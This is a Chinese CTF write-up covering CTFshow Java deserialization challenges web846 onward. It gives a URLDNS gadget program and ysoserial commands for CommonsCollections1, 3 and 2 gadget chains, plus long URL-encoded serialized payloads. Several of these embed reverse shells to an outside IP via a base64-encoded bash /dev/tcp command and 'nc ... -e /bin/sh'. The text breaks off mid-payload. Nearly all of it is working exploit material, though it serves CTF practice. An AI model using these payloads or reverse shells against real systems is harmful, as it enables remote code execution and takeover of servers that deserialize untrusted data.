【Web】CTFSHOW java反序列化刷题记录(部分)

news/2024/5/19 22:54:35 标签: java, ctfshow, 反序列化, java反序列化, ctf, web, tomcat

目录

web846-toc" style="margin-left:0px;">web846

web847-toc" style="margin-left:0px;">web847

web848-toc" style="margin-left:0px;">web848

web849-toc" style="margin-left:0px;">web849

web850-toc" style="margin-left:0px;">web850

web856-toc" style="margin-left:0px;">web856

web857-toc" style="margin-left:0px;">web857

web858-toc" style="margin-left:0px;">web858

web846">web846

直接拿URLDNS链子打就行

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutput;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.Base64;
import java.util.HashMap;

public class URLDNS {
    public static void serialize(Object obj) throws IOException{
        ByteArrayOutputStream data =new ByteArrayOutputStream();
        ObjectOutput oos =new ObjectOutputStream(data);
        oos.writeObject(obj);
        oos.flush();
        oos.close();
        System.out.println(Base64.getEncoder().encodeToString(data.toByteArray()));
    };

    public static void main(String[] args) throws Exception{
        URL url=new URL("http://68421999-595d-43ef-bbd8-f10c88147a01.challenge.ctf.show/");
        Class<?> c=url.getClass();
        Field hashcode=c.getDeclaredField("hashCode");
        hashcode.setAccessible(true);
        hashcode.set(url,1);
        HashMap<URL,Integer> h = new HashMap<URL,Integer>();
        h.put(url,1);
        hashcode.set(url,-1);
        serialize(h);
    }
}

payload:

ctfshow>ctfshow=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//3QANzY4NDIxOTk5LTU5NWQtNDNlZi1iYmQ4LWYxMGM4ODE0N2EwMS5jaGFsbGVuZ2UuY3RmLnNob3d0AAEvcQB+AAV0AARodHRwcHhzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXg=

也可直接用ysoserial

java -jar ysoserial.jar URLDNS "http://712840a9-ddc9-49a5-9e08-b29d74fe9910.challenge.ctf.show/"|base64

web847">web847

有关CC链:CC链 1-7 分析 - 先知社区

题目提示:

用CC1打就行

先生成反弹shell的payload:

java -jar ysoserial.jar CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"|base64

生成的payload放bp自带的decoder里进行一次url全编码

get方式传参

监听,成功反弹shell

web848">web848

TransformedMap也被ban了,CC1不能打了,换CC3

java -jar ysoserial.jar CommonsCollections3 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"|base64

除了payload要post传参,get传参长度太长会报错,其他流程都一样

payload:

ctfshow>ctfshow=%72%4f%30%41%42%58%4e%79%41%44%4a%7a%64%57%34%75%63%6d%56%6d%62%47%56%6a%64%43%35%68%62%6d%35%76%64%47%46%30%61%57%39%75%4c%6b%46%75%62%6d%39%30%59%58%52%70%62%32%35%4a%62%6e%5a%76%59%32%46%30%61%57%39%75%53%47%46%75%5a%47%78%6c%63%6c%58%4b%39%51%38%56%79%33%36%6c%41%67%41%43%54%41%41%4d%62%57%56%74%59%6d%56%79%56%6d%46%73%64%57%56%7a%64%41%41%50%54%47%70%68%64%6d%45%76%64%58%52%70%62%43%39%4e%59%58%41%37%54%41%41%45%64%48%6c%77%5a%58%51%41%45%55%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%51%32%78%68%63%33%4d%37%65%48%42%7a%66%51%41%41%41%41%45%41%44%57%70%68%64%6d%45%75%64%58%52%70%62%43%35%4e%59%58%42%34%63%67%41%58%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6e%4a%6c%5a%6d%78%6c%59%33%51%75%55%48%4a%76%65%48%6e%68%4a%39%6f%67%7a%42%42%44%79%77%49%41%41%55%77%41%41%57%68%30%41%43%56%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%33%4a%6c%5a%6d%78%6c%59%33%51%76%53%57%35%32%62%32%4e%68%64%47%6c%76%62%6b%68%68%62%6d%52%73%5a%58%49%37%65%48%42%7a%63%51%42%2b%41%41%42%7a%63%67%41%71%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%6a%62%32%31%74%62%32%35%7a%4c%6d%4e%76%62%47%78%6c%59%33%52%70%62%32%35%7a%4c%6d%31%68%63%43%35%4d%59%58%70%35%54%57%46%77%62%75%57%55%67%70%35%35%45%4a%51%44%41%41%46%4d%41%41%64%6d%59%57%4e%30%62%33%4a%35%64%41%41%73%54%47%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%59%32%39%74%62%57%39%75%63%79%39%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%79%39%55%63%6d%46%75%63%32%5a%76%63%6d%31%6c%63%6a%74%34%63%48%4e%79%41%44%70%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6d%4e%76%62%57%31%76%62%6e%4d%75%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%75%5a%6e%56%75%59%33%52%76%63%6e%4d%75%51%32%68%68%61%57%35%6c%5a%46%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4d%4d%65%58%37%43%68%36%6c%77%51%43%41%41%46%62%41%41%31%70%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%7a%64%41%41%74%57%30%78%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%32%4e%76%62%57%31%76%62%6e%4d%76%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%76%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%49%37%65%48%42%31%63%67%41%74%57%30%78%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6d%4e%76%62%57%31%76%62%6e%4d%75%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%75%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%49%37%76%56%59%71%38%64%67%30%47%4a%6b%43%41%41%42%34%63%41%41%41%41%41%4a%7a%63%67%41%37%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%6a%62%32%31%74%62%32%35%7a%4c%6d%4e%76%62%47%78%6c%59%33%52%70%62%32%35%7a%4c%6d%5a%31%62%6d%4e%30%62%33%4a%7a%4c%6b%4e%76%62%6e%4e%30%59%57%35%30%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%59%64%70%41%52%51%51%4b%78%6c%41%49%41%41%55%77%41%43%57%6c%44%62%32%35%7a%64%47%46%75%64%48%51%41%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%54%32%4a%71%5a%57%4e%30%4f%33%68%77%64%6e%49%41%4e%32%4e%76%62%53%35%7a%64%57%34%75%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%34%59%57%78%68%62%69%35%70%62%6e%52%6c%63%6d%35%68%62%43%35%34%63%32%78%30%59%79%35%30%63%6d%46%34%4c%6c%52%79%51%56%68%47%61%57%78%30%5a%58%49%41%41%41%41%41%41%41%41%41%41%41%41%41%41%48%68%77%63%33%49%41%50%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%79%35%6d%64%57%35%6a%64%47%39%79%63%79%35%4a%62%6e%4e%30%59%57%35%30%61%57%46%30%5a%56%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4e%49%76%30%66%36%53%47%30%44%73%43%41%41%4a%62%41%41%56%70%51%58%4a%6e%63%33%51%41%45%31%74%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%30%39%69%61%6d%56%6a%64%44%74%62%41%41%74%70%55%47%46%79%59%57%31%55%65%58%42%6c%63%33%51%41%45%6c%74%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%30%4e%73%59%58%4e%7a%4f%33%68%77%64%58%49%41%45%31%74%4d%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%39%69%61%6d%56%6a%64%44%75%51%7a%6c%69%66%45%48%4d%70%62%41%49%41%41%48%68%77%41%41%41%41%41%58%4e%79%41%44%70%6a%62%32%30%75%63%33%56%75%4c%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%65%47%46%73%59%57%34%75%61%57%35%30%5a%58%4a%75%59%57%77%75%65%48%4e%73%64%47%4d%75%64%48%4a%68%65%43%35%55%5a%57%31%77%62%47%46%30%5a%58%4e%4a%62%58%42%73%43%56%64%50%77%57%36%73%71%7a%4d%44%41%41%5a%4a%41%41%31%66%61%57%35%6b%5a%57%35%30%54%6e%56%74%59%6d%56%79%53%51%41%4f%58%33%52%79%59%57%35%7a%62%47%56%30%53%57%35%6b%5a%58%68%62%41%41%70%66%59%6e%6c%30%5a%57%4e%76%5a%47%56%7a%64%41%41%44%57%31%74%43%57%77%41%47%58%32%4e%73%59%58%4e%7a%63%51%42%2b%41%42%68%4d%41%41%56%66%62%6d%46%74%5a%58%51%41%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%55%33%52%79%61%57%35%6e%4f%30%77%41%45%56%39%76%64%58%52%77%64%58%52%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%64%41%41%57%54%47%70%68%64%6d%45%76%64%58%52%70%62%43%39%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%4f%33%68%77%41%41%41%41%41%50%2f%2f%2f%2f%39%31%63%67%41%44%57%31%74%43%53%2f%30%5a%46%57%64%6e%32%7a%63%43%41%41%42%34%63%41%41%41%41%41%4a%31%63%67%41%43%57%30%4b%73%38%78%66%34%42%67%68%55%34%41%49%41%41%48%68%77%41%41%41%47%2b%63%72%2b%75%72%34%41%41%41%41%79%41%44%6b%4b%41%41%4d%41%49%67%63%41%4e%77%63%41%4a%51%63%41%4a%67%45%41%45%48%4e%6c%63%6d%6c%68%62%46%5a%6c%63%6e%4e%70%62%32%35%56%53%55%51%42%41%41%46%4b%41%51%41%4e%51%32%39%75%63%33%52%68%62%6e%52%57%59%57%78%31%5a%51%57%74%49%4a%50%7a%6b%64%33%76%50%67%45%41%42%6a%78%70%62%6d%6c%30%50%67%45%41%41%79%67%70%56%67%45%41%42%45%4e%76%5a%47%55%42%41%41%39%4d%61%57%35%6c%54%6e%56%74%59%6d%56%79%56%47%46%69%62%47%55%42%41%42%4a%4d%62%32%4e%68%62%46%5a%68%63%6d%6c%68%59%6d%78%6c%56%47%46%69%62%47%55%42%41%41%52%30%61%47%6c%7a%41%51%41%54%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%62%47%39%68%5a%41%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4e%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%46%4e%30%64%57%4a%55%63%6d%46%75%63%32%78%6c%64%46%42%68%65%57%78%76%59%57%51%37%41%51%41%4a%64%48%4a%68%62%6e%4e%6d%62%33%4a%74%41%51%42%79%4b%45%78%6a%62%32%30%76%63%33%56%75%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%65%47%46%73%59%57%34%76%61%57%35%30%5a%58%4a%75%59%57%77%76%65%48%4e%73%64%47%4d%76%52%45%39%4e%4f%31%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%5a%47%39%6a%64%57%31%6c%62%6e%51%42%41%43%31%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%68%62%47%46%75%4c%32%6c%75%64%47%56%79%62%6d%46%73%4c%33%68%7a%62%48%52%6a%4c%30%52%50%54%54%73%42%41%41%68%6f%59%57%35%6b%62%47%56%79%63%77%45%41%51%6c%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%77%45%41%43%6b%56%34%59%32%56%77%64%47%6c%76%62%6e%4d%48%41%43%63%42%41%4b%59%6f%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%45%54%30%30%37%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%5a%48%52%74%4c%30%52%55%54%55%46%34%61%58%4e%4a%64%47%56%79%59%58%52%76%63%6a%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%61%58%52%6c%63%6d%46%30%62%33%49%42%41%44%56%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%6b%64%47%30%76%52%46%52%4e%51%58%68%70%63%30%6c%30%5a%58%4a%68%64%47%39%79%4f%77%45%41%42%32%68%68%62%6d%52%73%5a%58%49%42%41%45%46%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%77%45%41%43%6c%4e%76%64%58%4a%6a%5a%55%5a%70%62%47%55%42%41%41%78%48%59%57%52%6e%5a%58%52%7a%4c%6d%70%68%64%6d%45%4d%41%41%6f%41%43%77%63%41%4b%41%45%41%4d%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%6b%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%62%47%39%68%5a%41%45%41%51%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%79%64%57%35%30%61%57%31%6c%4c%30%46%69%63%33%52%79%59%57%4e%30%56%48%4a%68%62%6e%4e%73%5a%58%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%4f%57%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%55%63%6d%46%75%63%32%78%6c%64%45%56%34%59%32%56%77%64%47%6c%76%62%67%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%42%41%41%67%38%59%32%78%70%62%6d%6c%30%50%67%45%41%45%57%70%68%64%6d%45%76%62%47%46%75%5a%79%39%53%64%57%35%30%61%57%31%6c%42%77%41%71%41%51%41%4b%5a%32%56%30%55%6e%56%75%64%47%6c%74%5a%51%45%41%46%53%67%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%53%64%57%35%30%61%57%31%6c%4f%77%77%41%4c%41%41%74%43%67%41%72%41%43%34%42%41%47%46%69%59%58%4e%6f%49%43%31%6a%49%48%74%6c%59%32%68%76%4c%46%6c%74%52%6e%70%68%51%30%46%30%59%56%4e%42%4b%30%70%70%51%58%5a%61%52%31%59%79%54%44%4e%53%61%6d%4e%44%4f%48%68%4e%61%6c%46%31%54%57%70%4a%65%55%78%71%52%58%70%4f%61%54%52%36%54%58%6b%34%65%45%31%36%54%54%4e%4a%52%45%45%72%53%6d%70%46%50%58%31%38%65%32%4a%68%63%32%55%32%4e%43%77%74%5a%48%31%38%65%32%4a%68%63%32%67%73%4c%57%6c%39%43%41%41%77%41%51%41%45%5a%58%68%6c%59%77%45%41%4a%79%68%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%31%4e%30%63%6d%6c%75%5a%7a%73%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%51%63%6d%39%6a%5a%58%4e%7a%4f%77%77%41%4d%67%41%7a%43%67%41%72%41%44%51%42%41%41%31%54%64%47%46%6a%61%30%31%68%63%46%52%68%59%6d%78%6c%41%51%41%66%65%58%4e%76%63%32%56%79%61%57%46%73%4c%31%42%33%62%6d%56%79%4d%54%45%30%4e%44%63%78%4d%6a%51%35%4d%7a%41%32%4d%54%45%34%4d%67%45%41%49%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%55%48%64%75%5a%58%49%78%4d%54%51%30%4e%7a%45%79%4e%44%6b%7a%4d%44%59%78%4d%54%67%79%4f%77%41%68%41%41%49%41%41%77%41%42%41%41%51%41%41%51%41%61%41%41%55%41%42%67%41%42%41%41%63%41%41%41%41%43%41%41%67%41%42%41%41%42%41%41%6f%41%43%77%41%42%41%41%77%41%41%41%41%76%41%41%45%41%41%51%41%41%41%41%55%71%74%77%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%43%38%41%44%67%41%41%41%41%77%41%41%51%41%41%41%41%55%41%44%77%41%34%41%41%41%41%41%51%41%54%41%42%51%41%41%67%41%4d%41%41%41%41%50%77%41%41%41%41%4d%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%44%51%41%44%67%41%41%41%43%41%41%41%77%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%46%67%41%42%41%41%41%41%41%51%41%58%41%42%67%41%41%67%41%5a%41%41%41%41%42%41%41%42%41%42%6f%41%41%51%41%54%41%42%73%41%41%67%41%4d%41%41%41%41%53%51%41%41%41%41%51%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%44%67%41%44%67%41%41%41%43%6f%41%42%41%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%46%67%41%42%41%41%41%41%41%51%41%63%41%42%30%41%41%67%41%41%41%41%45%41%48%67%41%66%41%41%4d%41%47%51%41%41%41%41%51%41%41%51%41%61%41%41%67%41%4b%51%41%4c%41%41%45%41%44%41%41%41%41%43%51%41%41%77%41%43%41%41%41%41%44%36%63%41%41%77%46%4d%75%41%41%76%45%6a%47%32%41%44%56%58%73%51%41%41%41%41%45%41%4e%67%41%41%41%41%4d%41%41%51%4d%41%41%67%41%67%41%41%41%41%41%67%41%68%41%42%45%41%41%41%41%4b%41%41%45%41%41%67%41%6a%41%42%41%41%43%58%56%78%41%48%34%41%49%77%41%41%41%64%54%4b%2f%72%71%2b%41%41%41%41%4d%67%41%62%43%67%41%44%41%42%55%48%41%42%63%48%41%42%67%48%41%42%6b%42%41%42%42%7a%5a%58%4a%70%59%57%78%57%5a%58%4a%7a%61%57%39%75%56%55%6c%45%41%51%41%42%53%67%45%41%44%55%4e%76%62%6e%4e%30%59%57%35%30%56%6d%46%73%64%57%55%46%63%65%5a%70%37%6a%78%74%52%78%67%42%41%41%59%38%61%57%35%70%64%44%34%42%41%41%4d%6f%4b%56%59%42%41%41%52%44%62%32%52%6c%41%51%41%50%54%47%6c%75%5a%55%35%31%62%57%4a%6c%63%6c%52%68%59%6d%78%6c%41%51%41%53%54%47%39%6a%59%57%78%57%59%58%4a%70%59%57%4a%73%5a%56%52%68%59%6d%78%6c%41%51%41%45%64%47%68%70%63%77%45%41%41%30%5a%76%62%77%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4a%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%45%5a%76%62%7a%73%42%41%41%70%54%62%33%56%79%59%32%56%47%61%57%78%6c%41%51%41%4d%52%32%46%6b%5a%32%56%30%63%79%35%71%59%58%5a%68%44%41%41%4b%41%41%73%48%41%42%6f%42%41%43%4e%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%45%5a%76%62%77%45%41%45%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%50%59%6d%70%6c%59%33%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%41%49%51%41%43%41%41%4d%41%41%51%41%45%41%41%45%41%47%67%41%46%41%41%59%41%41%51%41%48%41%41%41%41%41%67%41%49%41%41%45%41%41%51%41%4b%41%41%73%41%41%51%41%4d%41%41%41%41%4c%77%41%42%41%41%45%41%41%41%41%46%4b%72%63%41%41%62%45%41%41%41%41%43%41%41%30%41%41%41%41%47%41%41%45%41%41%41%41%38%41%41%34%41%41%41%41%4d%41%41%45%41%41%41%41%46%41%41%38%41%45%67%41%41%41%41%49%41%45%77%41%41%41%41%49%41%46%41%41%52%41%41%41%41%43%67%41%42%41%41%49%41%46%67%41%51%41%41%6c%77%64%41%41%45%55%48%64%75%63%6e%42%33%41%51%42%34%64%58%49%41%45%6c%74%4d%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%4e%73%59%58%4e%7a%4f%36%73%57%31%36%37%4c%7a%56%71%5a%41%67%41%41%65%48%41%41%41%41%41%42%64%6e%49%41%48%57%70%68%64%6d%46%34%4c%6e%68%74%62%43%35%30%63%6d%46%75%63%32%5a%76%63%6d%30%75%56%47%56%74%63%47%78%68%64%47%56%7a%41%41%41%41%41%41%41%41%41%41%41%41%41%41%42%34%63%48%4e%79%41%42%46%71%59%58%5a%68%4c%6e%56%30%61%57%77%75%53%47%46%7a%61%45%31%68%63%41%55%48%32%73%48%44%46%6d%44%52%41%77%41%43%52%67%41%4b%62%47%39%68%5a%45%5a%68%59%33%52%76%63%6b%6b%41%43%58%52%6f%63%6d%56%7a%61%47%39%73%5a%48%68%77%50%30%41%41%41%41%41%41%41%41%42%33%43%41%41%41%41%42%41%41%41%41%41%41%65%48%68%32%63%67%41%53%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%39%32%5a%58%4a%79%61%57%52%6c%41%41%41%41%41%41%41%41%41%41%41%41%41%41%42%34%63%48%45%41%66%67%41%75

web849">web849

 用CC2打

然后用nc来反弹shell

nc 124.222.136.33 1337 -e /bin/sh
java -jar ysoserial.jar CommonsCollections2 "nc 124.222.136.33 1337 -e /bin/sh "|base64

最终payload:

ctfshow>ctfshow=%72%4f%30%41%42%58%4e%79%41%42%64%71%59%58%5a%68%4c%6e%56%30%61%57%77%75%55%48%4a%70%62%33%4a%70%64%48%6c%52%64%57%56%31%5a%5a%54%61%4d%4c%54%37%50%34%4b%78%41%77%41%43%53%51%41%45%63%32%6c%36%5a%55%77%41%43%6d%4e%76%62%58%42%68%0a%63%6d%46%30%62%33%4a%30%41%42%5a%4d%61%6d%46%32%59%53%39%31%64%47%6c%73%4c%30%4e%76%62%58%42%68%63%6d%46%30%62%33%49%37%65%48%41%41%41%41%41%43%63%33%49%41%51%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%0a%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%7a%51%75%59%32%39%74%63%47%46%79%59%58%52%76%63%6e%4d%75%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%61%57%35%6e%51%32%39%74%63%47%46%79%59%58%52%76%63%69%2f%35%68%50%41%72%73%51%6a%4d%0a%41%67%41%43%54%41%41%4a%5a%47%56%6a%62%33%4a%68%64%47%56%6b%63%51%42%2b%41%41%46%4d%41%41%74%30%63%6d%46%75%63%32%5a%76%63%6d%31%6c%63%6e%51%41%4c%55%78%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%32%4e%76%62%57%31%76%62%6e%4d%76%0a%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%30%4c%31%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4f%33%68%77%63%33%49%41%51%47%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%0a%61%57%39%75%63%7a%51%75%59%32%39%74%63%47%46%79%59%58%52%76%63%6e%4d%75%51%32%39%74%63%47%46%79%59%57%4a%73%5a%55%4e%76%62%58%42%68%63%6d%46%30%62%33%4c%37%39%4a%6b%6c%75%47%36%78%4e%77%49%41%41%48%68%77%63%33%49%41%4f%32%39%79%0a%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%7a%51%75%5a%6e%56%75%59%33%52%76%63%6e%4d%75%53%57%35%32%62%32%74%6c%63%6c%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%0a%68%2b%6a%2f%61%33%74%38%7a%6a%67%43%41%41%4e%62%41%41%56%70%51%58%4a%6e%63%33%51%41%45%31%74%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%30%39%69%61%6d%56%6a%64%44%74%4d%41%41%74%70%54%57%56%30%61%47%39%6b%54%6d%46%74%5a%58%51%41%0a%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%55%33%52%79%61%57%35%6e%4f%31%73%41%43%32%6c%51%59%58%4a%68%62%56%52%35%63%47%56%7a%64%41%41%53%57%30%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%51%32%78%68%63%33%4d%37%65%48%42%31%0a%63%67%41%54%57%30%78%71%59%58%5a%68%4c%6d%78%68%62%6d%63%75%54%32%4a%71%5a%57%4e%30%4f%35%44%4f%57%4a%38%51%63%79%6c%73%41%67%41%41%65%48%41%41%41%41%41%41%64%41%41%4f%62%6d%56%33%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%31%0a%63%67%41%53%57%30%78%71%59%58%5a%68%4c%6d%78%68%62%6d%63%75%51%32%78%68%63%33%4d%37%71%78%62%58%72%73%76%4e%57%70%6b%43%41%41%42%34%63%41%41%41%41%41%42%33%42%41%41%41%41%41%4e%7a%63%67%41%36%59%32%39%74%4c%6e%4e%31%62%69%35%76%0a%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6e%68%68%62%47%46%75%4c%6d%6c%75%64%47%56%79%62%6d%46%73%4c%6e%68%7a%62%48%52%6a%4c%6e%52%79%59%58%67%75%56%47%56%74%63%47%78%68%64%47%56%7a%53%57%31%77%62%41%6c%58%54%38%46%75%72%4b%73%7a%0a%41%77%41%47%53%51%41%4e%58%32%6c%75%5a%47%56%75%64%45%35%31%62%57%4a%6c%63%6b%6b%41%44%6c%39%30%63%6d%46%75%63%32%78%6c%64%45%6c%75%5a%47%56%34%57%77%41%4b%58%32%4a%35%64%47%56%6a%62%32%52%6c%63%33%51%41%41%31%74%62%51%6c%73%41%0a%42%6c%39%6a%62%47%46%7a%63%33%45%41%66%67%41%4c%54%41%41%46%58%32%35%68%62%57%56%78%41%48%34%41%43%6b%77%41%45%56%39%76%64%58%52%77%64%58%52%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%64%41%41%57%54%47%70%68%64%6d%45%76%64%58%52%70%0a%62%43%39%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%4f%33%68%77%41%41%41%41%41%50%2f%2f%2f%2f%39%31%63%67%41%44%57%31%74%43%53%2f%30%5a%46%57%64%6e%32%7